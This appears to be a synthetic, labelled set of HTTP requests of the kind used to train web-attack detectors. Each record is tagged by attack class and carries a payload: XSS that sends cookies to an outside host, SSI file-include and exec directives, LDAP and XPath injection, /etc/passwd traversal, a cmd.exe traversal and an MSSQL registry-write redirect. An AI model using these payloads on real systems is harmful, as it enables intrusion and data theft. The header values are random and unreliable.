MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM enJvaHVucXplRnN4ZnRlZWVkMzhwZnQ4cjJqeXRhaDlxdDAyZQ==
Authorization: Digest nonce
Range: -3
Referer: http://www.CnlCey.uk/ci5orVoe/tenqe/aunlf8zn.exe
TE: trailers,trailers,trailers
Trailer: From
User-Agent: sps8LhPa
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4509x153
Via: 2.8 www.ea9nten.tiff, FTP/8.2 11.137.75.51
Transfer-Encoding: compress
Upgrade: 8atc6a/5.7, oCej/1.5, Siiai/7.2
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43335
Start - Id: 48140
class: XSS
GET /xE3G4lvjexecw/wnmHtton2lTIlaAn4nn/bguIonio/lgJXCna_wdBjbT@ztb4/rdniwO.tiff?pten=asl&rnoh=%3Cxml+src+%3D++%22+javascript%3A+++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.naasroat.com%2Fcgi-bin%2Fse.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E HTTP/1.0
Host: 208.113.78.107
Connection: oEsr
Accept: image/png, application/*, video/mpeg
Accept-Charset: *
Accept-Encoding: identity;q=0.4, deflate, identity;q=0.5
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 34.160.166.92
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="618"
Date: Fri, 14 May 04 17:31:58 CET
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Mon, 03 Sep 07 02:10:43 GMT
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: "_sQzlgpRyjqlMrtJz"
Max-Forwards: 01
MIME-Version: 8.0
Pragma: uoeb=tairw
Proxy-Authorization: Digest realm
Authorization: Digest qop=dtNle
Range: 4-,0-614
Referer: http://www.DysjoR.fr/7eTjr9n/e4az.asp
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: ir7etup (n7sn0ucGZ; mWi1pKi; yYFBm7yM)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: identity
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48140
Start - Id: 38820
class: LdapInjection
GET /i@3yEgDmyDm/rhoa/eeDaosao6ie/cDwlR5/S9ietgaamt83/qiot/sbRmg/OQfGp/i_FSoUdAN7A0WqZT/oi/e6hSateuenhtwrL.jsp?twedhnhgleuj=%29+++%28++++%7C+++%28+cn%3D*o%27brien*++%29%28mail++++%3D*o%27brien*++%29++++&eNPu=9+httpsey3Swinntte&pbhR=6MityVUyz&oU.boot.iniRGM4GHk=%2Feeupdater&tgXefUh5uue=nnne&fEss0t1fogbnN=656&9Z3AoJvM=n6Caep3Oian98e&5i51e8diuh=uac2k&d9yara=qg%7Codr&AKkzexec=%3Eh&nmttay22zN=21&cw=91200681&CtwmKsjV=+T&HdselectNt=skW HTTP/1.0
Host: 84.236.61.31
Connection: keep-alive
Accept: image/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=19556
Client-ip: 166.96.232.49
Cookie: ouaeh=700;Evdeh=ew
Cookie2: $Version="4"
Date: Wed, 12 Jul 06 01:48:52 UTC
ETag: W/"h37vwYz1lL0OI8Y"
Expect: 100-continue
From: Emhleev@7nsic.de
If-Modified-Since: Sat, 21 Oct 06 04:21:44 CET
If-Unmodified-Since: Sun, 08 Aug 04 09:39:35 GMT
If-Match: *
If-None-Match: "6yIrmTw1gqsS98sQA"
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 5
MIME-Version: 3.3
Pragma: u=sait
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Digest algorithm=MD5
Range: 55524-
Referer: /ht92wey.pdf
TE: chunked,deflate;q=0.6
Trailer: Via
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 1.8; hs-r6; rv:9.8.5) Gecko/72105057
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: tPiVt; ueAtt=isolelc
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38820
Start - Id: 39856
class: SSI
PUT /noy9/2z/SED@WC9zNE/eVujf.zo0v_oXc4w-J_/wvATahrrz/oN@L6BU8sQVJE/aAyJ6/msTFVui.82TH/se/lalthrnat/e.g.msf? HTTP/1.1
Content-Length: 147
Content-Language: eebEmb
Content-Encoding: gzip
Content-Location: /rlMTpSl/mxtomttl/t1sa/co2nA.cgi
Content-MD5: ZHRzYmV0dGVubml0Y2Zzbg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 24 Jan 05 12:32:50 GMT
Host: 68.10.190.21
Connection: Bn2tlht
Accept: */*
Accept-Charset: x-mac-turkish;q=0.8, x-mac-cyrillic;q=0.9, iso-2022-kr;q=0.4
Accept-Language: *
Client-ip: 207.175.239.116
Cookie: niskoevvaEh=nuKr53;6x01=4467259;psoai=sappy8PoX;Sto7uacbwggs=15;dhotrt=706500;uL=<!--   #include     virtual="/var/log/httpd/access.log"    -->
Date: Mon, 08 Jun 09 11:17:48 GMT
Expect: 100-continue
If-Modified-Since: Fri, 06 Nov 09 07:26:41 UTC
If-Match: "Se@FvjYzVltF-MzPGCul"
Pragma: no-cache
Range: 18-,9-12691,384064-
Referer: /simspa/n1Klczno/vtan9ml7/zldoeee/lsMAoa9r.swf
User-Agent: Mozilla/2.9 (Windows; U; WinNT 0.4; Tr-eh; rv:6.0.0) Gecko/72525023
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ziasr=+Ninr&_4%uulogn482X=0640&rdaBecrean=eshezdw&AsG=6443&hielaubVeyhs=http&ofgdeset6RhiE=61172935&hee=mZna3YNdtu&rdDsbsu0Eu=ecopyn5uafbodyhtpassf

End - Id: 39856
Start - Id: 39108
class: LdapInjection
POST /hJtkGRn/e4V_/s.OteD/lemo5istasmsosve/8moJfbetweenhttpT/ai9tt/ieTV_.qte/yqWiR0Cl20Mvsy/q9i4tsntgeyrnbo.png? HTTP/1.1
Content-Length: 197
Content-Language: edaF6rAt
Content-Encoding: gzip
Content-Location: /lptaae/etina/Noioigon/5C3Etl/oetpfa.wmn
Content-MD5: ZjJ3VWxiemlhbmxlZWVpYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Oct 09 14:57:33 GMT
Last-Modified: Wed, 19 Apr 06 01:54:47 UTC
Host: www.4zubi.ch
Connection: close
Accept: application/x-tar;q=0.8
Accept-Charset: x-mac-chinesetrad, windows-1253;q=0.0, x-mac-japanese;q=0.1, x-mac-roman;q=0.1, utf-7;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 112.218.49.24
Cookie: qAae2ie=sWjdgJAp62;nO8=")(targetfilter=(o=NetscapeRoot));E9igah=3437;iea=nhd3Egon5mgd;heedsothf=329883;dnnibinoe=iinputoE
Cookie2: $Version="899"
Date: Fri, 09 May 08 07:03:23 CET
ETag: W/"EDp2SaBaF8CHZTkiBLFB"
Expect: n8sci=pwfh
From: raspuv@ntperaoi0.com
If-Modified-Since: Fri, 12 Dec 08 11:40:38 UTC
If-Unmodified-Since: Fri, 03 Apr 09 20:38:30 UTC
If-Match: *
If-None-Match: "@K.T_KU2UZXMaAE0"
If-Range: *
Max-Forwards: 6144
MIME-Version: 4.0
Pragma: no-cache
Authorization: Digest qop=auth-int
Range: 2-38479
Referer: /ersQ/lhed.php4
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Aigsnoaaiee0adhyrae
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7309x3114
Via: 8.2 208.104.216.93, FTP/1.7 www.eqtzsh.jpg
Transfer-Encoding: identity
Upgrade: amhze/2.8, g9yre/3.8, kz8a/2.7, Lxl/6.9
Warning: 090 www.daarr.html "tlodnt" 
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahh9epkrnye1mx=bhn tvr2s Svwdna%un&d43mrdcnlznctuN=cdgrwomr0n&d4o=30869&43matga5n1mo=etf&tbherr5ol=tEktd4&yasd1r4ogiai=d1yt=&Rp=68991&baili77hfa2ta=&Eh&eaO=eof&ccn6=uexecd+&eLJIqezuqdc=5114

End - Id: 39108
Start - Id: 39544
class: SSI
PUT /su%uD/1BRz/tHR/nM2UPCxCdvDGVIaGNC/biXiooq9renge/NielIthlindRhd/mjME4E2R-r_yBP/iiko/5emvidtbiTtOrgrueS/t1pemspetyfvtstekb/rEzU0WUM@7kpR9Kol/tX0qvItoAYfK5HQ.cgi? HTTP/1.0
Content-Length: 301
Content-Language: 7tuiM,s0iP,at4
Content-Encoding: gzip
Content-Location: /oapethoR/4m4T/oizm9i.tiff
Content-MD5: cHNnbm5ldWM1dDJuaXJzRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Sat, 25 Sep 04 15:10:58 GMT
Host: 46.126.12.28
Connection: keep-alive
Accept: video/*, text/*;q=0.4
Accept-Charset: iso-8859-3, hz-gb-2312;q=0.2, x-mac-cyrillic;q=0.4, hz-gb-2312, iso-8859-8-i
Accept-Encoding: *;q=0.9
Accept-Language: ta-ppEn;q=0.1, oTnnswt-lpGo, seido-dtLHhrs, oiuXnuo-r;q=0.4, Xcho-la;q=0.1
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: apyopcahsxfolEi=shyd5honleT4dbsaar
Cookie2: $Version="21"
Date: Wed, 24 May 06 20:01:33 CET
ETag: "Fy7oJSR8Kvcmx6kiLh"
Expect: tkvh
From: nsnhcot@wollyC.st
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: "@zy.mKCE-5ORFJEI1Ve"
If-None-Match: "Wo2ebZMJidzslMq"
Max-Forwards: 898
MIME-Version: 1.1
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: Digest realm
Referer: http://www.etrt.com/iduizenm/ooy44dR.aspx
TE: trailers,gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/4.2 (X11; U; Linux i386 8.5; f2-ea; rv:5.6.9) Gecko/16650064
UA-Disp: 0663,736,8
UA-OS: Windows 95
UA-Color: color8
Via: 0.0 138.99.195.173:79
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 543 www.ydocee8.html "biTseoerdCyyr4oaht" 
X-Serial-Number: 11507528452920010282
----: --------------------

np1uoidyaO=<!--#include virtual="/var/log/httpd/access.log" -->&eie=ofUre cpwheremeta>ehttpc&aNehg=29225967&eA6gsalogre7R4=tw41Lsattlps&jsetkattu=ttia&sw9GdsRvnwtsIli=561&som2wqbqw=lnsrcttaihd&R5sid=i&a6=niehe&fLo=tns&5iTthasliy6u=wslmetc&wywkndiwhe5sede=70917945&ne5=205809857

End - Id: 39544
Start - Id: 48298
class: XPathInjection
GET /nf/jfv9jHn.htm?neuAjxisMisr=ndd%7EiEtmpmn&wn=ndwu&re7acto4rprea=3ue2mf4ood8ae&ZsXDCIP.NJBK=Icjao9zNFma&8xvf.AXv=ndk0c&5s=hvuD6a1K&K9DbzkVZXaccept=79483282 HTTP/1.1
Host: 132.92.241.177
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: x-mac-arabic;q=0.8, macintosh, x-mac-cyrillic;q=0.2, iso-8859-6, koi8-r;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: 4sgadm=e
Client-ip: 173.189.210.204
Cookie2: $Version="35"
Date: Tue, 01 May 07 12:01:43 GMT
ETag: W/"mKjNXmrxC6@pcuzz"
Expect: taiaob
From: mSrf3p@empeero.de
If-Modified-Since: Sat, 01 Dec 07 24:56:05 CET
If-Unmodified-Since: Wed, 02 Jul 08 12:52:00 CET
If-Match: "RGZiilWlYbdxMTXCeViZ"
If-None-Match: *
If-Range: Sun, 20 Sep 09 10:39:59 CET
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aW93b2RuOmE5aWJZbWg=
Referer: /ongidR5.nsf
TE: deflate;q=0.1,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 06     or  1<  sksks/roayre/q0hno/child::text()[position()=14]    or    37444='] | /* | /foo[bar='
UA-Disp: 2950,738,32
UA-Pixels: 7350x333
Via: 6.4 81.67.164.121, 1.9 www.ileiE6.css, 5.3 www.iodlLmba.shtml
Transfer-Encoding: gzip
Upgrade: ktlatf/2.6, dtr/7.2
Warning: 917 209.120.191.237 "rpaWttoyTfGs" "Mon, 30 May 05 05:56:19 GMT"
X-Forwarded-For: 145.155.0.124
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48298
Start - Id: 35600
class: XPathInjection
GET /t0G6-_gEr@/tmp138pi2x0d/sX-ox@aWar98tKOQ/-locationlikeYQ/wHQ7sZ8Szl@2cz/cla/y6tK9b/eYgysw@Oz/y4.js?LBvbscriptlJK9Pftpw-=9&c1slnsvMenNle=dy%5Ddjotpasswd+ce1&laueiu=142+++++or+++++yholgE%2F0ctn%2Fest%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D613%5D+or+++++22%3D HTTP/1.0
Host: www.dnrensvxeX.gov
Connection: close
Accept: */*
Accept-Charset: windows-1251, iso-8859-8-i
Accept-Encoding: *
Accept-Language: ee-5h, e8nm-eo;q=0.5, utceriP-irec;q=0.5, dhMQ-nal
Cache-Control: max-age=50152
Client-ip: 132.226.188.115
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="52"
Date: Tue, 01 Feb 05 23:22:23 UTC
ETag: "2IZLr6UCFS8Snl6TN"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 31 Jan 10 06:05:04 CET
If-Unmodified-Since: Thu, 01 Apr 10 24:36:04 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: Mon, 26 Feb 07 17:08:41 CET
Max-Forwards: 084
MIME-Version: 4.7
Pragma: msAtteao='pfv'
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: RTEehi n0ae=metS
Range: 1278-6
Referer: http://nflerahw.com/tt0rnoRl/horgrMge/lcIR.fgf
TE: gzip;q=0.8,trailers
Trailer: Warning
User-Agent: roc7 (ho1EwPCJ)
UA-CPU: 68000
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 7.9 www.Ofii.css, di7TMh/0.8 www.t8orrqit.png
Transfer-Encoding: compress
Upgrade: 0tfj/9.0, 9ledtn/8.4
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 93.7.188.203
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35600
Start - Id: 37872
class: LdapInjection
GET /t0k5cXUbATI/eTdEteRAnmie/Adx1Nsfe0h00nt5/5ea3ofHC-sy4/hc3K_c3g.qH@Par/exec.L6A_wget/ie/mQpRTtilXNV0Uby6/mtsN-fbz_Ad2W7_Va/YFg7m9lCq/z8U0D8T/T.WAmG9bfromURxMnK.mdb?2llyoeksel=%29%28%7C++++%28displayName%3Dhad*%29+%28name+%3D++++had*++++%29%28+mail%3Dhad*+++%29&sonntSce=net HTTP/1.0
Host: www.iieuifcef.uk
Connection: indclk
Accept: text/*;q=0.3
Accept-Charset: windows-1252;q=0.6, ks_c_5601-1987, iso-8859-15, iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: IfA0-uonn, a3itr-wpas;q=0.8, p-thoe, G-hv
Cache-Control: max-stale=9
Client-ip: 243.107.176.204
Cookie: 6c=78;5b1ngchnekpeos=il:adminy|i8gsee0 insert
Cookie2: $Version="0"
Date: Thu, 18 Jun 09 15:44:59 CET
ETag: W/"pzr-MWT_QI7QEla-I"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Thu, 15 Oct 09 05:52:44 CET
If-Match: "dufDhMLYNzKBPICs"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: Fri, 12 Mar 04 05:36:31 CET
Max-Forwards: 1743
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: mHrk sGamdg=QmliIol
Range: 89-,46-035533,8-609
Referer: http://www.tuiuxt.gov/njse7c/e9eylrn/9jntttV/hwvt/5ehfo.mp3
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: nl-AxmO http://www.eriigw.st
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.1 178.2.110.138:185, 7.6 www.eepQitop.css, 8.4 231.254.118.238
Transfer-Encoding: compress
Upgrade: obsm/5.8, 9ryw/0.8, Scti3/4.8
Warning: 121 www.2yE9crtu.js "o3rtsabl" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37872
Start - Id: 46176
class: PathTransversal
GET /szwCCOeaTBjo/oBysCZlu/i1@q2ykiJLwMl8/txXqK2IqKltkeS/rCE/hRtrtmmx/zgXR1-x6Wt98es11/aakRfHrCopVB2MY/r.90A/hk2V2ltN6vWqjPT/npoI.e/LHiEl7db.dll?exren=%2Fetc%2Fpasswd&TosegZetcgc=hHiframed&ty9dfnard=591&niehmne=19665&snh8Oysketmf=036217 HTTP/1.1
Host: 112.42.104.73
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 200.242.126.46
Cookie: ndwHNcG=bnhnis(hruuyiform;WpTEimgI=2tlcCe0Elrt
Cookie2: $Version="18"
Date: Fri, 05 Sep 08 24:47:32 UTC
ETag: "hgS4mgI8rGzEY4sN"
Expect: wpscl=eLmpno
From: e6aS@otptT.st
If-Modified-Since: Thu, 09 Feb 06 21:28:50 GMT
If-Unmodified-Since: Wed, 17 Aug 05 04:21:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 41
MIME-Version: 6.1
Pragma: jh1=jkrmell
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: NTLM d2xwcmVzdGhzbHQ1ZTFPOWlyc3VuaGRuTGxlaGF0dnQyc3RpQWVoeQ==
Range: -423
Referer: /xretToe/ehig.mpg
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: eneaeene89hEesTgdur
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 8.3 www.ua2h.png, 8.4 113.142.174.243, 9.5 www.tOe4w.shtml
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 242 166.158.209.31 "osstwt77pxap" "Mon, 09 Mar 09 01:01:39 CET"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46176
Start - Id: 44112
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.liner27.de
Connection: eetgsy
Accept: audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 249.225.32.40
Cookie: steeanr=mvOU;istRi6nnH=o;oe=ao4G;a6aNrvcojI=isiogritnodtg5;Asa=wP w5nullq>\r/neasbi
Cookie2: $Version="74"
Date: Tue, 02 May 06 07:01:42 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Wed, 23 Sep 09 14:49:37 GMT
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: "fKEF0dZiePItOjLu"
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 4
MIME-Version: 5.1
Pragma: conk='t2'
Proxy-Authorization: Basic ZTA4aG86eWVvZA==
Authorization: Digest response="afdC7c9C382D67aA3EeB6f57DBcE82f1"
Range: 827-
Referer: /pauioix/wiuisLus.avi
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 8.0; 1a-ot; rv:1.5.3) Gecko/08694987
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 378 196.189.21.245:66 "hoiooiLnwuhilt51e" "Sun, 15 Jan 06 06:34:10 UTC"
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44112
Start - Id: 39189
class: SSI
PUT /imgcYoinputK/cheesrelLeeqh/eCOKDFsNWh8dMw8gZ/dR.bOmB@1i/11asEwantNhlErpl6ei/Owf2rHfdYe31d/dSmeEaid/hlnot.jpeg? HTTP/1.0
Content-Length: 178
Content-Language: cixab0ib,2t,seahed7
Content-Encoding: gzip
Content-Location: http://eenh.uk/eeg1pw5T/srheeOv.pdf
Content-MD5: U3BldWUzYWQ2aU5Bb2FlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Sat, 23 Jul 05 03:02:02 GMT
Host: 97.79.242.41
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=45208
Client-ip: 240.32.159.203
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="86"
Date: Mon, 27 Jul 09 16:37:23 GMT
ETag: W/"-34z6eXQuW2gPmIxn"
Expect: s2C5
From: nGxh@nraae5E.gov
If-Modified-Since: Mon, 11 Feb 08 19:42:35 GMT
If-Unmodified-Since: Wed, 17 Oct 07 03:28:46 CET
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: *
If-Range: Sun, 04 Jan 04 19:01:59 GMT
Max-Forwards: 9030
MIME-Version: 4.8
Pragma: Ht='mcla2swu'
Proxy-Authorization: Digest realm
Authorization: NTLM c2l0aXNhZW1lb21wcndBcGtvaGV0dGhzc2R0TG5lZXlrZUFlZnRodHRmdHdveFQ=
Range: 53710-,-18914,6-
Referer: http://www.m2s0coa.fr/up8ihon/eExlrotd/Z0ouu51e/s2nelr/Mssyh.tar
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 0.6; Es-r4; rv:3.7.3) Gecko/97983799
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 4765226560917916
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahm=17&teo2qenkg=774&asnolohpeslbsr=it6xp_hlm a9iluEh&en=qgroup by8&hoasstlss=webnett1nE&loirriiNc7sgyre=e&ocatpmndNnAgie=trA&ih4et9khee=<!--#echo var="date_gmt"-->

End - Id: 39189
Start - Id: 36425
class: OsCommanding
GET /egrietmsixqz/eEPHqST_/2UP/Ounuzehtses/insertfwHin/eshI/h5dn5b.bin?aa4tugdWEotexE=ghneyN&leea9r7sh=Wometa2%5C&uoiwmirmee=lehaciet1&Tevmti1dn=1612008&vVuqWvar=5639&Sid0mJiv=6361&nmghl2hsimti=9630898733&dban=vaJtsfmecgoenlha&nee8mti5je=exec+++xp_regwrite+++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27itl%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&Afuoebta8=e&ecuefiShsOhmrU=34851135 HTTP/1.1
Host: 90.215.126.83:88789
Connection: close
Accept: audio/*
Accept-Charset: cp-932;q=0.1, iso-8859-4, hz-gb-2312
Accept-Language: *;q=0.3
Date: Mon, 13 Feb 06 08:59:34 CET
ETag: "op0i3r.Aek1eSN.qG40"
From: ptsw9@ixuysooiG.biz
If-Unmodified-Since: Thu, 28 Jul 05 12:47:50 GMT
Max-Forwards: 4
Range: 88159-63443,9509-
Referer: http://eigi.cz/ceoe/ansumae/elwa.php4
User-Agent: Mozilla/6.1 (Windows; U; Win98 6.1; pg-nA; rv:1.9.3) Gecko/64891099
----: ----------------

null

End - Id: 36425
Start - Id: 40348
class: SSI
PUT /no4QuF7r4/o_Wrc828YxtOmwz0O/tOefBA/pncL9Qeb_0eXBlf/tslcnr8faasrfbaTe25/cntrossoieb1/oZnponeesatmtm/linkWJTrlz9iDDE0T/iYvRp80J0X1ti-.DW/LF0lUtmp_nJZ.js? HTTP/1.0
Content-Length: 96
Content-Language: e,aiooTazf
Content-Encoding: deflate
Content-Location: http://pidoevF.de/Iyos/nmmhsch9/o20yF/Eebsnt.tiff
Content-MD5: cmhwYWtud3VzcENrdTNlNw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Nov 04 04:09:15 GMT
Host: 192.145.185.50
Connection: r1joyee
Accept: application/*;q=0.1, audio/*;q=0.2, text/xml
Accept-Charset: koi8;q=0.4, iso-8859-1
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 202.95.30.44
Date: Thu, 21 Jul 05 11:39:33 GMT
ETag: "p2iBxCf7rwTSWWwcX0ie"
If-Match: "WjhkQDP-NZjw.o_Dg"
Max-Forwards: 44
Proxy-Authorization: Basic ckE3c2Q6UGlzdA==
Referer: http://www.xxferose.biz/alatoitI/ofeei/eueih/6h0ae.wav
TE: chunked
Trailer: If-None-Match
User-Agent: <!-- #exec  cmd="c:\progra~1\oyzethi\gEosfEaoy\id.exe     d:\EL\www.aninittien.org\dv\database.mdb  /x  exporttofoxpro"-->
UA-Color: color16
Via: FTP/9.2 213.206.19.122, 7.6 www.s7zlEo.gif:864

hirot9Cr=tdeletea&aMehEndn=segrdti8&optF6NV47gnndX=50070&idtpLr=telnete2eymsdaiaLho4t&5Ihttctc=4

End - Id: 40348
Start - Id: 48581
class: XPathInjection
POST /iLNWd_2GLY1kk_TuQ_K/xiEhSracrhgmtln0tiih/rO9/rcIrasnqsc1n/dLAnss3ulbPf/fgQ_hfM0Y@/qC/CBfiboot.inibGclUMQCy/hl2IvvfABu/42zkBp9RVDFg/yeNIBJTxd/1eYZ6.php4? HTTP/1.1
Content-Length: 297
Content-Language: 2arxs,ieuekia
Content-Encoding: compress
Content-Location: /man2orns.wmn
Content-MD5: bWxFZWFuSHN1ZTJyaGllTw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 08:23:05 UTC
Last-Modified: Mon, 12 May 08 13:24:56 CET
Host: 244.58.103.151
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-tw;q=0.8, koi8-r
Accept-Encoding: identity, identity, gzip;q=0.9
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 58.151.109.14
Cookie: c6ino=hTyohhnohh;nezahmuacoFdcae=TyasOm;9PechoElXD=uhsw&)Ta-;itmissyeLnnot=ygbAou..I1wQ;eore=s@I3cW.qd07;gAK8passthru8328Es=77752
Cookie2: $Version="380"
Date: Mon, 01 Feb 10 05:02:28 CET
ETag: "pn9FUh6eD1tnxJb11"
Expect: iJvsn=ronjlII
